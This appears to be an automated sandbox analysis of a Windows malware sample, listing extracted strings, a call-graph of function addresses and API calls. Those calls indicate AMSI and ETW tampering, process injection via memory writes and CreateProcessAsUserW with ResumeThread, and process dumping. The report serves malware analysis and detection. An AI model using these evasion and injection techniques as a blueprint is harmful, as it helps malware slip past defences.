                                                                                                                                • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                • API String ID: 376050052-1225450241
                                                                                                                                • Opcode ID: a09d55ebb0311cb1f7889d089a1ffbf87f17272eafd831353dfd538b9d9e4b5a
                                                                                                                                • Instruction ID: df926f98ff82f14b9f920bdf403e8297e6b093458490a99048dce426044efc0d
                                                                                                                                • Opcode Fuzzy Hash: a09d55ebb0311cb1f7889d089a1ffbf87f17272eafd831353dfd538b9d9e4b5a
                                                                                                                                • Instruction Fuzzy Hash: D643D575A801189FDF21EB65DE909CE73FAFF88304F5044E6A509AB614DE30AE92CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 7737 2ab3e11-2ab5d82 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a949a0 call 2a93244 call 2aae678 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa7c10 call 2aa894c call 2a94860 call 2a949a0 call 2a947ec call 2a949a0 call 2aa7c10 call 2aa894c call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c call 2aa88b8 call 2aaf094 call 2a947ec call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2aae358 call 2a94de0 call 2a94764 call 2a94de0 call 2aadc8c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa88b8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 Sleep call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a949a0 call 2a94d74 call 2aadc04 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94d74 call 2aadc04 call 2a94d74 call 2aadc04 call 2a94d74 call 2aadc04 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae398 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97acc call 2aaf16c call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2aaf108 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 8666 2ab7568-2ab77e3 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 7737->8666 8667 2ab5d88-2ab5dcd call 2a94860 call 2a949a0 call 2a946d4 call 2a97e5c 7737->8667 8813 2ab77e9-2ab7e3b call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949a0 call 2a946d4 call 2aaadf8 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8666->8813 8814 2ab8318-2ab8517 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 8666->8814 8667->8666 8684 2ab5dd3-2ab66e5 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2aa85bc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 8667->8684 9647 2ab66eb-2ab6944 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a94d74 call 2a94de0 call 2a94764 call 2aadc8c 8684->9647 9648 2ab6949-2ab706c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a936d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a92f08 call 2a97990 call 2a947ec call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a93700 8684->9648 9581 2ab7e3d-2ab7e40 8813->9581 9582 2ab7e42-2ab8120 call 2aa5aec call 2a94bcc call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa7e50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aab118 call 2a93700 8813->9582 8989 2ab851d-2ab86f0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2a94d74 call 2a94df0 CreateProcessAsUserW 8814->8989 8990 2ab93a1-2ab9524 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 8814->8990 9201 2ab876e-2ab8879 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8989->9201 9202 2ab86f2-2ab8769 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 8989->9202 9172 2ab952a-2ab9539 call 2a948ec 8990->9172 9173 2ab9cf5-2abb2fa call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 * 16 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2aa7c10 call 2aa8338 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ExitProcess 8990->9173 9172->9173 9184 2ab953f-2ab9812 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97e5c 9172->9184 9604 2ab9818-2ab9aea call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 * 2 call 2a94764 call 2aadc8c 9184->9604 9605 2ab9aef-2ab9cf0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa8d70 9184->9605 9360 2ab887b-2ab887e 9201->9360 9361 2ab8880-2ab8ba0 call 2a949f8 call 2aade50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aad164 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 9201->9361 9202->9201 9360->9361 9890 2ab8bb9-2ab939c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ResumeThread call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 9361->9890 9891 2ab8ba2-2ab8bb4 call 2aa8730 9361->9891 9581->9582 9604->9605 9605->9173 9647->9648 9890->8990 9891->9890
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA
                                                                                                                                  • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02AADCCB
                                                                                                                                  • Part of subcall function 02AADC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02AADD32
                                                                                                                                  • Part of subcall function 02AADC8C: NtClose.NTDLL(?), ref: 02AADD3B
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,ScanString,02B12F60,02ABB7B8,02ABBB30,00000000,00000000,02ABBB24,00000000,00000000), ref: 02AB40CB
                                                                                                                                  • Part of subcall function 02AA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
                                                                                                                                  • Part of subcall function 02AA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,000003E8,ScanBuffer,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB4277
                                                                                                                                  • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
                                                                                                                                  • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
